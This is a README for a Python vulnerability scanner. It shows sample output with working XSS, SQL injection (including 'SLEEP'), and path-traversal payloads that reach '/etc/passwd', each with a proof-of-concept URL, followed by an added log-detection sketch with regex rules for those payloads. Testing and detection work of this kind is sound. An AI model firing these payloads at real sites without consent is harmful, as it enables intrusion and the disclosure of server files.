Vuln Scanner With Python

Overview

VulnScanner



Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

Time-based SQL injection test.

Error-based SQL injection test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


How To Run

git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py 'http://example.com/page.php?cat=1'

Example of Output

python3 vulnscan.py 'http://example.com/page.php?cat=1'

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!
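
Seen from the defender's side, the requests behind the sample run above leave a recognisable trail in web server access logs. The sketch below is an added example, not part of VulnScanner: the log lines are constructed, and the rule names and regexes are illustrative assumptions keyed to the payloads shown in the output.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /page.php?cat=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2023:10:00:01 +0000] "GET /page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E HTTP/1.1" 200 530
203.0.113.5 - - [01/Jan/2023:10:00:02 +0000] "GET /page.php?cat=1-SLEEP(2) HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2023:10:00:04 +0000] "GET /page.php?cat=%27 HTTP/1.1" 500 210
203.0.113.5 - - [01/Jan/2023:10:00:05 +0000] "GET /page.php?cat=../../../../etc/passwd HTTP/1.1" 200 1830
203.0.113.5 - - [01/Jan/2023:10:00:06 +0000] "TRACE / HTTP/1.1" 200 120
198.51.100.7 - - [01/Jan/2023:10:01:00 +0000] "GET /page.php?cat=2 HTTP/1.1" 200 498
"""

REQUEST = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')

# One rule per test family in the sample output; the patterns are assumptions.
RULES = {
    "xss": re.compile(r"<\s*script\b", re.I),
    "sqli_time": re.compile(r"\bsleep\s*\(", re.I),
    "sqli_error": re.compile(r"=\s*'(?:&|$)"),
    "lfi": re.compile(r"(\.\./){2,}|/etc/passwd", re.I),
}

def decode(target):
    """Percent-decode twice so double-encoded payloads are normalised too."""
    return unquote(unquote(target))

def classify(line):
    """Return (client_ip, [rule names]) for a suspicious line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, method, target = m.groups()
    tags = [name for name, rx in RULES.items() if rx.search(decode(target))]
    if method == "TRACE":  # XST probing relies on the TRACE method
        tags.append("xst")
    return (ip, tags) if tags else None

def summarize(log_text):
    """Group matched rule names by client IP across a whole log."""
    hits = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            hits.setdefault(result[0], set()).update(result[1])
    return hits
```

A single client tripping several unrelated rules within seconds, as in the constructed log, is a stronger scanner signal than any one match on its own.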


Disclaimer

Using VulnScanner to attack targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal and international laws.
The developer assumes no liability and is not responsible for any misuse or damage caused by this program.
